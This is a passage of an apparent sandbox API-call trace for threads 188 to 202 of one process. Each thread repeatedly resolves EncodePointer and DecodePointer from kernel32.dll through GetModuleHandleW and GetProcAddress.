[0194.526] SysReAllocStringLen (in: pbstr=0x168ffcc0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ffcc0*="KERNEL32.DLL") returned 1 [0194.526] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.527] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.530] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 188 os_tid = 0x488 [0194.974] SysReAllocStringLen (in: pbstr=0x16b7f8e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b7f8e4*="KERNEL32.DLL") returned 1 [0194.974] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.974] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.976] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0194.977] SysReAllocStringLen (in: pbstr=0x16b7f8e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b7f8e4*="KERNEL32.DLL") returned 1 [0194.977] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.977] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.980] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0194.980] SysReAllocStringLen (in: pbstr=0x16b7f8c0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b7f8c0*="KERNEL32.DLL") returned 1 [0194.980] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.980] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.982] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0194.985] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0195.123] SysReAllocStringLen (in: pbstr=0x16b7fb98*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b7fb98*="KERNEL32.DLL") returned 1 [0195.123] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.124] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.127] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 189 os_tid = 0x600 [0195.030] SysReAllocStringLen (in: pbstr=0x16c8f6ac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16c8f6ac*="KERNEL32.DLL") returned 1 [0195.030] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.030] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.033] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0195.081] SysReAllocStringLen (in: pbstr=0x16c8f6ac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16c8f6ac*="KERNEL32.DLL") returned 1 [0195.081] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.081] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.084] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0195.085] SysReAllocStringLen (in: pbstr=0x16c8f688*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16c8f688*="KERNEL32.DLL") returned 1 [0195.085] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.085] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.088] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0195.091] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0195.384] SysReAllocStringLen (in: pbstr=0x16c8f960*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16c8f960*="KERNEL32.DLL") returned 1 [0195.384] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.385] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.388] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 190 os_tid = 0x598 [0195.221] SysReAllocStringLen (in: pbstr=0x16e7f904*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16e7f904*="KERNEL32.DLL") returned 1 [0195.221] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.221] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.224] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0195.224] SysReAllocStringLen (in: pbstr=0x16e7f904*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16e7f904*="KERNEL32.DLL") returned 1 [0195.224] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.225] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.227] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0195.227] SysReAllocStringLen (in: pbstr=0x16e7f8e0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16e7f8e0*="KERNEL32.DLL") returned 1 [0195.227] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.228] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.230] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0195.233] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0195.628] SysReAllocStringLen (in: pbstr=0x16e7fbb8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16e7fbb8*="KERNEL32.DLL") returned 1 [0195.628] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.628] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.631] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 191 os_tid = 0x6b8 [0195.972] SysReAllocStringLen (in: pbstr=0x16b0f6d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b0f6d4*="KERNEL32.DLL") returned 1 [0195.972] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.973] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.976] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0195.977] SysReAllocStringLen (in: pbstr=0x16b0f6d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b0f6d4*="KERNEL32.DLL") returned 1 [0195.977] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.977] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.980] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0195.981] SysReAllocStringLen (in: pbstr=0x16b0f6b0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b0f6b0*="KERNEL32.DLL") returned 1 [0195.981] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.981] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.986] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0195.989] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.315] SysReAllocStringLen (in: pbstr=0x16b0f988*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b0f988*="KERNEL32.DLL") returned 1 [0196.315] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.316] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.319] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 192 os_tid = 0x760 [0196.448] SysReAllocStringLen (in: pbstr=0x168ff3ec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ff3ec*="KERNEL32.DLL") returned 1 [0196.448] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.448] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.451] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.451] SysReAllocStringLen (in: pbstr=0x168ff3ec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ff3ec*="KERNEL32.DLL") returned 1 [0196.451] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.454] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.454] SysReAllocStringLen (in: pbstr=0x168ff3c8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ff3c8*="KERNEL32.DLL") returned 1 [0196.454] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.455] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.457] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0196.459] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.720] SysReAllocStringLen (in: pbstr=0x168ff6a0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ff6a0*="KERNEL32.DLL") returned 1 [0196.720] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.721] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.724] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 193 os_tid = 0x120 [0196.500] SysReAllocStringLen (in: pbstr=0x6aef8f4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aef8f4*="KERNEL32.DLL") returned 1 [0196.500] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.501] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.503] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.503] SysReAllocStringLen (in: pbstr=0x6aef8f4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aef8f4*="KERNEL32.DLL") returned 1 [0196.503] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.504] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.506] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.506] SysReAllocStringLen (in: pbstr=0x6aef8d0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aef8d0*="KERNEL32.DLL") returned 1 [0196.506] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.506] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.509] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0196.511] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.889] SysReAllocStringLen (in: pbstr=0x6aefba8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aefba8*="KERNEL32.DLL") returned 1 [0196.889] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.889] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.892] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 194 os_tid = 0xb78 [0196.566] SysReAllocStringLen (in: pbstr=0x16c1f6c4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16c1f6c4*="KERNEL32.DLL") returned 1 [0196.566] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.566] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.569] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.570] SysReAllocStringLen (in: pbstr=0x16c1f6c4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16c1f6c4*="KERNEL32.DLL") returned 1 [0196.570] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.570] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.573] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.574] SysReAllocStringLen (in: pbstr=0x16c1f6a0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16c1f6a0*="KERNEL32.DLL") returned 1 [0196.574] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.587] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0196.590] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.986] SysReAllocStringLen (in: pbstr=0x16c1f978*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16c1f978*="KERNEL32.DLL") returned 1 [0196.986] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.986] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.989] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 195 os_tid = 0x68c [0196.783] SysReAllocStringLen (in: pbstr=0x16d8f55c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16d8f55c*="KERNEL32.DLL") returned 1 [0196.783] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.784] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.787] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.787] SysReAllocStringLen (in: pbstr=0x16d8f55c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16d8f55c*="KERNEL32.DLL") returned 1 [0196.787] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.788] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.791] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.792] SysReAllocStringLen (in: pbstr=0x16d8f538*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16d8f538*="KERNEL32.DLL") returned 1 [0196.792] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.792] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.795] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0196.799] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.991] SysReAllocStringLen (in: pbstr=0x16d8f810*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16d8f810*="KERNEL32.DLL") returned 1 [0196.991] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.991] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.993] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 196 os_tid = 0x30c [0197.125] SysReAllocStringLen (in: pbstr=0x657f974*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657f974*="KERNEL32.DLL") returned 1 [0197.125] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0197.125] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0197.128] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0197.128] SysReAllocStringLen (in: pbstr=0x657f974*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657f974*="KERNEL32.DLL") returned 1 [0197.128] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0197.128] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0197.131] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0197.131] SysReAllocStringLen (in: pbstr=0x657f950*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657f950*="KERNEL32.DLL") returned 1 [0197.131] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0197.131] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0197.133] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0197.136] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0197.281] SysReAllocStringLen (in: pbstr=0x657fc28*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657fc28*="KERNEL32.DLL") returned 1 [0197.281] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0197.281] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0197.284] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 198 os_tid = 0x8a8 [0198.187] SysReAllocStringLen (in: pbstr=0x6adf674*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6adf674*="KERNEL32.DLL") returned 1 [0198.187] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.188] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.191] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.192] SysReAllocStringLen (in: pbstr=0x6adf674*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6adf674*="KERNEL32.DLL") returned 1 [0198.192] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.192] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.196] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.196] SysReAllocStringLen (in: pbstr=0x6adf650*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6adf650*="KERNEL32.DLL") returned 1 [0198.196] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.197] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.200] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0198.203] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.385] SysReAllocStringLen (in: pbstr=0x6adf928*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6adf928*="KERNEL32.DLL") returned 1 [0198.385] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.386] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.388] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 199 os_tid = 0xb60 [0198.205] SysReAllocStringLen (in: pbstr=0x168df79c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168df79c*="KERNEL32.DLL") returned 1 [0198.205] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.205] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.209] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.209] SysReAllocStringLen (in: pbstr=0x168df79c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168df79c*="KERNEL32.DLL") returned 1 [0198.209] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.210] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.212] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.213] SysReAllocStringLen (in: pbstr=0x168df778*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168df778*="KERNEL32.DLL") returned 1 [0198.213] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.213] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.215] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0198.229] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.576] SysReAllocStringLen (in: pbstr=0x168dfa50*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168dfa50*="KERNEL32.DLL") returned 1 [0198.577] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.577] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.582] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 200 os_tid = 0x634 [0198.435] SysReAllocStringLen (in: pbstr=0x16c5f36c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16c5f36c*="KERNEL32.DLL") returned 1 [0198.435] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.435] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.438] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.438] SysReAllocStringLen (in: pbstr=0x16c5f36c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16c5f36c*="KERNEL32.DLL") returned 1 [0198.438] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.438] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.441] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.441] SysReAllocStringLen (in: pbstr=0x16c5f348*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16c5f348*="KERNEL32.DLL") returned 1 [0198.441] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.441] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.444] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0198.446] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.779] SysReAllocStringLen (in: pbstr=0x16c5f620*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16c5f620*="KERNEL32.DLL") returned 1 [0198.779] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.780] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.783] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 201 os_tid = 0xa18 [0198.502] SysReAllocStringLen (in: pbstr=0x16b1faac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b1faac*="KERNEL32.DLL") returned 1 [0198.503] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.503] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.505] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.506] SysReAllocStringLen (in: pbstr=0x16b1faac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b1faac*="KERNEL32.DLL") returned 1 [0198.506] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.506] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.508] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.508] SysReAllocStringLen (in: pbstr=0x16b1fa88*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b1fa88*="KERNEL32.DLL") returned 1 [0198.508] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.509] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.511] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0198.514] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.903] SysReAllocStringLen (in: pbstr=0x16b1fd60*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b1fd60*="KERNEL32.DLL") returned 1 [0198.903] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.904] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.907] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 202 os_tid = 0x3b4 [0198.992] SysReAllocStringLen (in: pbstr=0x16b3f7fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b3f7fc*="KERNEL32.DLL") returned 1 [0198.992] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.993] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.996] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.996] SysReAllocStringLen (in: pbstr=0x16b3f7fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b3f7fc*="KERNEL32.DLL") returned 1 [0198.996] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.996] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.998] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.999] SysReAllocStringLen (in: pbstr=0x16b3f7d8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b3f7d8*="KERNEL32.DLL") returned 1 [0198.999] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.999] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.001] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0199.003] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0199.141] SysReAllocStringLen (in: pbstr=0x16b3fab0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b3fab0*="KERNEL32.DLL") returned 1 [0199.141] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.142] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 